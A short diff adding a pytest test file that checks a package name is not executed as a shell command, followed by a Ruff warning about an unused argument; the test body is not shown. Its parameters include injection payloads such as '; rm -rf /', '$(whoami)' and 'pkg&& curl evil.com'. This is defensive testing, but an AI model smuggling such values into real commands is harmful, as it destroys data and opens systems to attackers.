tests/test_invariant_strap.py

```
@@ -0,0 +1,39 @@
+import subprocess
+import os
+import tempfile
+
+
+@pytest.mark.parametrize("payload", [
+    "; rm -rf /",           # exact exploit: shell metachar injection
+    "$(whoami)",            # command substitution attack
+    "valid-package-name",  # valid input (no metacharacters)
+    "pkg&& curl evil.com", # chained command injection
+])
+def test_package_name_not_executed_as_shell_command(payload, tmp_path):
```

Ruff (0.15.17)

[warning] Unused function argument: `payload`

(ARG001)